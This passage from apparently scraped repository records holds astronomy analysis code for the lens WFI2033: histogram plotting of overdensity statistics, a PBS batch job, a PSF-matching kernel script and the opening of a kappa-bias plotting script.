color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_\\frac{M^2}{r}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 11\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=23\n\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\n\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nplt.subplot(4,5,14)\nrangemax=6\n\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(4,5,14)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_\\frac{M^3}{r}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 12\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=25\n\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\n\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nx = linspace(0,3,500)\n\n\ngauss_q_W4_50 = gaussian_kde(q_W4_50)\n\ngauss_q_W4_75 = gaussian_kde(q_W4_75)\n\nplt.subplot(4,5,16)\nrangemax=8\n\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75, histtype='step', 
color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n#plt.plot(x,gauss_q_W1_50(x),'b', linewidth=0.5)\nax=plt.subplot(4,5,16)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W1_75(x))],np.average(q_W1_75),np.median(q_W1_75))\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'${\\zeta_\\frac{M_{rms}^2}{r}}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 13\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=27\n\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\n\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nx = linspace(0,3,500)\n\n\ngauss_q_W4_50 = gaussian_kde(q_W4_50)\n\ngauss_q_W4_75 = gaussian_kde(q_W4_75)\n\nplt.subplot(4,5,17)\nrangemax=8\n\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(4,5,17)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W1_75(x))],np.average(q_W1_75),np.median(q_W1_75))\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'${\\zeta_\\frac{M_{rms}^3}{r}}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 14\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=29\n\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\n\nq_W4_75read = 
np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nplt.subplot(4,5,18)\nrangemax=7\n\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(4,5,18)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_\\frac{zM}{r}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 15\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=31\n\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\n\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nplt.subplot(4,5,19)\nrangemax=10\n\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(4,5,19)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_\\frac{zM^2}{r}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 16\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n 
W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\nplt.legend(bbox_to_anchor=(1.5, 4), loc='center left', borderaxespad=0., fontsize=10)\n\n#plt.subplots_adjust(top=0.6)\n\nplt.tight_layout()\n\nplt.savefig('%s_overdensities_%s_size%s_i%s_%s.png' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), dpi=1000)\n\n#plt.show()\n\nos.system(\"rm fieldshistW4_50_%s_%s_size%s_i%s_%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])))\nos.system(\"rm fieldshistW4_75_%s_%s_size%s_i%s_%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])))\n\nif str(sys.argv[2]) == \"samp\":\n print(\" --- %s seconds ---\" % (time.time() - start_time))\n\nprint 'Done!'\n" }, { "alpha_fraction": 0.6843910813331604, "alphanum_fraction": 0.7821612358093262, "avg_line_length": 28.149999618530273, "blob_id": "d336afd373626acad87153b0af028e5e0cbdfe3a", "content_id": "270e35494647106aef01e6e5623dfd405ca76a4e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 583, "license_type": "no_license", "max_line_length": 86, "num_lines": 20, "path": "/python/scripts/NAOJ/batch_infersim15.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1m\n#PBS -o Log15s.out\n#PBS -e Log15s.err\n#PBS -N 15s\n#PBS -l mem=16gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /mfst01a/rusucs/WFI2033/MSwghtratios/\n\npython inferkappasimbias.py WFI2033 5 45 23 meds gal gamma oneoverr mass3overrrms\npython inferkappasimbias.py WFI2033 5 120 23 meds gal gamma oneoverr mass3overrrms\npython inferkappasimbiasphil.py WFI2033 5 45 23 meds gal gamma oneoverr mass3overrrms\npython inferkappasimbiasphil.py WFI2033 5 120 23 meds gal gamma oneoverr mass3overrrms\n" }, { "alpha_fraction": 0.6311819553375244, "alphanum_fraction": 0.662213146686554, "avg_line_length": 26.05539321899414, "blob_id": "b358be17ef15c90f0610b0953486a828e3368537", "content_id": "4ede25a38668bdb19e2d284343adcc8d73e659af", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9281, "license_type": "no_license", "max_line_length": 143, "num_lines": 343, "path": "/python/image_utilities/py_mk-kernels.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Code from Adam Tomczak, used to create kernels in order to broaden a narrow PSF in order to match a broader one. 
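The matching kernel is obtained below by Richardson-Lucy deconvolution (skimage.restoration.richardson_lucy) of the broader PSF with the narrower one, after pixels below bg + 3 sigma are replaced by an analytic model fit (the hybrid PSFs). 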
Approximates the PSF analytically.\n# The actual convolution of images using the kernel is done by the convolution.py code.\n\nimport pylab\nfrom scipy import signal\nfrom scipy import ndimage\nfrom scipy import optimize\nfrom astropy.io import fits\nfrom astropy import modeling\nfrom skimage import restoration\nfrom photutils import CircularAperture\nfrom photutils import aperture_photometry\n\nmoffat2d = modeling.functional_models.Moffat2D()\n\nclass MoffatTomczak2D(modeling.Fittable2DModel):\n amplitude = modeling.Parameter(default=1)\n x_0 = modeling.Parameter(default=0)\n y_0 = modeling.Parameter(default=0)\n scale = modeling.Parameter(default=1)\n rotation = modeling.Parameter(default=0)\n gamma = modeling.Parameter(default=1)\n alpha = modeling.Parameter(default=1)\n\n @staticmethod\n def evaluate(x, y, amplitude, x_0, y_0, scale, rotation, gamma, alpha):\n\t\trr_gg = (((x - x_0)*scale) ** 2 + (y - y_0) ** 2) / gamma ** 2\n\t\trr_gg_alpha = amplitude * (1 + rr_gg) ** (-alpha)\n\t\trr_gg_alpha_rotate = ndimage.rotate(rr_gg_alpha, rotation, reshape=0)\n\t\treturn rr_gg_alpha_rotate\n\nmoffatTomczak = MoffatTomczak2D()\n\nmodel_fitter = modeling.fitting.LevMarLSQFitter()\n\nlens_name = 'WFI2033'\n\n#imnames = ['u', 'i']\n\n#psfs = [fits.getdata('u_psfnorm.fits'),\n#\t\tfits.getdata('g_psfnorm.fits')]\n\nimnames = ['r', 'ch1']\n\npsfs = [fits.getdata('modifiedforTPHOT/ir_PSFfix.fits'),\n fits.getdata('ch1/ch1psffix_oversampled.fits')]\n\n\n\ncogs = []\ncogs_moffs = []\nfwhms = []\nfluxtot = pylab.array([])\nprofiles = []\nmoffat_psfs = []\nmoffatTomczak_psfs = []\n\nbgs = pylab.array([])\nscatters = pylab.array([])\n\ncogs_conv = []\nfwhms_conv = []\n\ndy, dx = psfs[0].shape\ny0, x0 = dy/2, dx/2\n\npx_scale = 0.2018\nradii = pylab.linspace(0.5, dx/2-1, 20)\napers = [CircularAperture([x0, y0], r=ri) for ri in radii]\n\n\n\nfig = pylab.figure(figsize=(12.4, 12.9))\nsp2 = fig.add_subplot(222)\nsp1 = fig.add_subplot(221)\nsp4 = fig.add_subplot(224)\nsp3 = fig.add_subplot(223)\n\nsp1.minorticks_on()\nsp2.minorticks_on()\nsp3.minorticks_on()\nsp4.minorticks_on()\n\nsp1.grid()\nsp2.grid()\nsp3.grid()\nsp4.grid()\n\nsp1.set_xlabel('radius [\"]')\nsp2.set_xlabel('radius [\"]')\t\nsp3.set_xlabel('radius [\"]')\nsp4.set_xlabel('radius [\"]')\n\nsp1.set_ylabel('Flux(r)')\nsp3.set_ylabel('$\\Sigma$ Flux(< r) / model')\n\n#sp3.axhline(1, color='k', lw=1.5, ls='--')\n#sp4.axhline(1, color='k', lw=1.5, ls='--')\n\nfig.subplots_adjust(wspace=0)\n\n\nfor i in range(len(psfs)):\n\n\tpsf = psfs[i]\n\n\n\t### Estimating FWHM\n\txx, yy = pylab.meshgrid(range(-dx/2+1, dx/2+1), range(-dx/2+1, dx/2+1))\n\trr = (xx**2 + yy**2)**0.5\n\tr_uniq = pylab.unique(rr)\n\tprofile = pylab.array([])\n\tfor ri in r_uniq:\n\t\trinds = pylab.where(rr == ri)\n\t\tprofile = pylab.append(profile, pylab.mean(psf[rinds]))\n\tfwhm = 2 * pylab.interp(profile.max()/2., profile[::-1], r_uniq[::-1])\n\n\n\t### Estimating background, noise, and total flux of psf\n\tinds_outer = pylab.where(rr > 2*fwhm)\n\tbg = pylab.median(psf[inds_outer])\n\tscatter = pylab.std(psf[inds_outer])\n\tbgs = pylab.append(bgs, bg)\n\tscatters = pylab.append(scatters, scatter)\n\tinds_seg = pylab.where(psf > bg + 2*scatter)\n\tinds_nonseg = pylab.where(psf <= bg + 2*scatter)\n\n#\tpsf -= bg\n\taper_tot = CircularAperture([x0, y0], r=4./0.2)\n\tphot_tot = aperture_photometry(psf, aper_tot)\n\tfluxtot = pylab.append(fluxtot, phot_tot['aperture_sum'])\n\tpsf /= fluxtot[-1]\n\n\n\t### Re-estimating FWHM from bg-subtracted psf\n\trr = (xx**2 + 
yy**2)**0.5\n\tr_uniq = pylab.unique(rr)\n\tprofile = pylab.array([])\n\tfor ri in r_uniq:\n\t\trinds = pylab.where(rr == ri)\n\t\tprofile = pylab.append(profile, pylab.mean(psf[rinds]))\n\tfwhm = 2 * pylab.interp(profile.max()/2., profile[::-1], r_uniq[::-1])\n\tfwhms.append(fwhm)\n\n\n\t### Fitting a moffat profile\n\tfit = model_fitter(moffat2d, xx, yy, psf)\n\tfits.writeto('moffat_' + imnames[i] + '.fits', fit(xx, yy), clobber=1)\n\tfits.writeto('resid_' + imnames[i] + '-moffat.fits', psf-fit(xx, yy), clobber=1)\n\n\t### Fitting a moffat+tomczak profile\n\tfit2 = model_fitter(moffatTomczak, xx, yy, psf)\n\tfits.writeto('moffatTomczak_' + imnames[i] + '.fits', fit2(xx, yy), clobber=1)\n\tfits.writeto('resid_' + imnames[i] + '-moffatTomczak.fits', psf-fit2(xx, yy), clobber=1)\n\n\tmoffat_psfs.append(fit(xx, yy))\n\tmoffatTomczak_psfs.append(fit(xx, yy))\n\n\n\n\t### Plotting profiles\n\tcolor = pylab.cm.jet(i * 1. / (len(psfs) - 1))\n\tsp1.plot(r_uniq * px_scale, profile / profile.max(), color=color, lw=3, label=imnames[i] + ' %.2f' % (fwhm * px_scale) + '\"')\n\tprofiles.append(profile / profile.max())\n\n\tsp2.axhline(10, color=color, label=imnames[i] + ' %.2f' % (fwhm * px_scale) + '\"')\n\n\n\t### Measuring curve of growth\n\tcog = pylab.array([])\n\tcog_moff = pylab.array([])\n\tfor aper in apers:\n\t\tphot = aperture_photometry(psf, aper)\n\t\tphot_moff = aperture_photometry(fit(xx, yy), aper)\n\t\tcog = pylab.append(cog, phot['aperture_sum'])\n\t\tcog_moff = pylab.append(cog_moff, phot_moff['aperture_sum'])\n\tcogs.append(cog)\n\tcogs_moffs.append(cog_moff)\n\n\n\tprint imnames[i], '%.2f' % fwhm\n\n\n### PSF with largest FWHM\nind_max_fwhm = fwhms.index(max(fwhms))\ncolor = pylab.cm.jet(ind_max_fwhm * 1. / (len(psfs) - 1))\nsp2.plot(r_uniq * px_scale, profiles[ind_max_fwhm], color=color, lw=3)\n\n\n\n\n\nsp2.legend(loc=1, title=lens_name)\nsp1.axis([-0.1, 4.4, -0.1, 1.1])\nsp2.axis([-0.1, 4.4, -0.1, 1.1])\n\n\n\n\n\n\n### Plotting curves of growth\ncogs = pylab.array(cogs)\nmean_cog = pylab.average(cogs, axis=0)\n\nfor i in range(len(psfs)):\n\tsp3.plot(radii * px_scale, cogs[i] / cogs_moffs[ind_max_fwhm], color=pylab.cm.jet(i * 1. 
/ (len(psfs) - 1))\n\n\n\nsp3.axis([-0.1, 4.4, 0.87, 1.13])\nsp4.axis([-0.1, 4.4, 0.87, 1.13])\n\n\n\n\n\n\nfor i in range(len(fwhms)):\n\n\tif i == ind_max_fwhm:\n\t\ttarget_cog = cogs[i]\n\t\tcogs_conv.append(cogs[i])\n\t\tcontinue\n\n\tpsf1 = psfs[i]\n\tpsf2 = psfs[ind_max_fwhm]\n\n\tmoff1 = moffat_psfs[i]\n\tmoff2 = moffat_psfs[ind_max_fwhm]\n\n\tmoffTomcz1 = moffatTomczak_psfs[i]\n\tmoffTomcz2 = moffatTomczak_psfs[ind_max_fwhm]\n\n\t### Masking out corners\n\tinds_corners = pylab.where(rr > dx/2)\n\tmoff1[inds_corners] *= 0\n\tmoff2[inds_corners] *= 0\n\tmoffTomcz1[inds_corners] *= 0\n\tmoffTomcz2[inds_corners] *= 0\n\n\t### Creating hybrid PSFs by replacing pixels < (bg+3sigma) with the model\n\tindslo1 = pylab.where(psf1 < bgs[i] + 3*scatters[i])\n\tindslo2 = pylab.where(psf2 < bgs[ind_max_fwhm] + 3*scatters[ind_max_fwhm])\n\n\thybrid1, hybrid2 = psf1 * 1., psf2 * 1.\n\thybrid1[indslo1] = moffTomcz1[indslo1]\n\thybrid2[indslo2] = moffTomcz2[indslo2]\n\n\n\n\tniter = 100\n\n\t'''\n\t### Data kernel\n\tkernel_data = restoration.richardson_lucy(psf2, psf1, iterations=niter)\n\tkernel_data /= kernel_data.sum()\n\tk0 = 'kernel_' + imnames[ind_max_fwhm] + '-' + imnames[i] + '_data.fits'\n\tfits.writeto(k0, kernel_data, clobber=1)\n\n\t### Moffat kernel\n\tkernel_moff = restoration.richardson_lucy(moff2, moff1, iterations=niter)\n\tkernel_moff /= kernel_moff.sum()\n\tk1 = 'kernel_' + imnames[ind_max_fwhm] + '-' + imnames[i] + '_moff.fits'\n\tfits.writeto(k1, kernel_moff, clobber=1)\n\n\t### Moffat-Tomczak kernel\n\tkernel_moffTomcz = restoration.richardson_lucy(moffTomcz2, moffTomcz1, iterations=niter)\n\tkernel_moffTomcz /= kernel_moffTomcz.sum()\n\tk2 = 'kernel_' + imnames[ind_max_fwhm] + '-' + imnames[i] + '_moffTomcz.fits'\n\tfits.writeto(k2, kernel_moffTomcz, clobber=1)\n\t'''\n\n\t### Hybrid kernel\n\tkernel_hybrid = restoration.richardson_lucy(hybrid2, hybrid1, iterations=niter)\n\tkernel_hybrid /= kernel_hybrid.sum()\n\tk3 = 'kernel_' + imnames[ind_max_fwhm] + '-' + imnames[i] + '_hybrid.fits'\n\tfits.writeto(k3, kernel_hybrid, clobber=1)\n\n\n\n\t### Adding info to kernel headers\n\tfor kern in [k3]:\n\t\tf = fits.open(kern, mode='update')\n\t\th = f[0].header\n\t\th['NITER'] = (niter, 'number of Richardson Lucy iterations')\n\t\tf.close()\n\n\n\n\t### Testing by convolving psf1 by kernel\n\tconv = signal.convolve2d(psf1, kernel_hybrid, mode='same')\n\n\tfits.writeto('conv_'+ imnames[ind_max_fwhm] + '-' + imnames[i] + '.fits', conv, clobber=1)\n\tfits.writeto('resid_'+ imnames[ind_max_fwhm] + '-' + imnames[i] + '.fits', psf2 - conv, clobber=1)\n\n\tprint 'generated kernels from', imnames[i], 'to', imnames[ind_max_fwhm]\n\n\n\n\n\t### Estimating convolved FWHM\n\tprofile = pylab.array([])\n\tfor ri in r_uniq:\n\t\trinds = pylab.where(rr == ri)\n\t\tprofile = pylab.append(profile, pylab.mean(conv[rinds]))\n\tfwhm = 2 * pylab.interp(profile.max()/2., profile[::-1], r_uniq[::-1])\n\tfwhms_conv.append(fwhm)\n\n\n\t### Plotting profiles\n\tcolor = pylab.cm.jet(i * 1. 
/ (len(psfs) - 1))\n\tsp2.plot(r_uniq * px_scale, profile / profile.max(), color=color, lw=3)\n\n\n\t### Measuring curve of growth\n\tcog = pylab.array([])\n\tfor aper in apers:\n\t\tphot = aperture_photometry(conv, aper)\n\t\tcog = pylab.append(cog, phot['aperture_sum'])\n\tcogs_conv.append(cog)\n\n\n\n\n\n\n\n### Plotting curves of growth\ncogs_conv = pylab.array(cogs_conv)\nmean_cog_conv = pylab.average(cogs_conv, axis=0)\n\nfor i in range(len(psfs)):\n\tsp4.plot(radii * px_scale, cogs_conv[i] / cogs[ind_max_fwhm], color=pylab.cm.jet(i * 1. / (len(psfs) - 1)))\n\n\n\n### Plotting estimate for catalog aperture as maximum FWHM +30%\nsp4.axvline(max(fwhms) * px_scale, color='k', ls='--', lw=3, label='FWHM')\nsp4.axvline(max(fwhms) * px_scale * 1.3, color='k', lw=3, label='\"ideal\"\\naperture')\n\nsp4.legend(loc=1, prop={'size':18})\nfig.savefig('psfdiagnostics.png' , dpi=250)\n\n" }, { "alpha_fraction": 0.6590761542320251, "alphanum_fraction": 0.7085104584693909, "avg_line_length": 57.306724548339844, "blob_id": "6171b4623376e60e5691f689fcd6459da7347f53", "content_id": "a88b609973f8262cfac3fed3a8edffe09bfa9709", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13877, "license_type": "no_license", "max_line_length": 175, "num_lines": 238, "path": "/python/catalogue_utilities/plotkappabiasphil.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Use as python plot plotkappabiasphil.py WFI2033 5 23 45\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport scipy as sp\nfrom scipy.stats import norm\nimport numpy as np\nimport sys\nimport os\nfrom os import system\n\nlens = str(sys.argv[1])\ninner = str(sys.argv[2])\nmag = str(sys.argv[3])\nrad = str(sys.argv[4])\n\nbins = np.linspace(-0.20,0.20,300)\nhalfwidth = (bins[1]-bins[0])/2\n\nroot = \"/Users/eduardrusu/Dropbox/Davis_work/code/GOODCODE/WFI2033kappa/\"\n\ncol1 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_oneoverr_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol2 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_oneoverr_z_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol3 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_oneoverr_mass_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol4 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_oneoverr_mass2_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol5 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_oneoverr_mass3_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol6 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_oneoverr_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol7 = 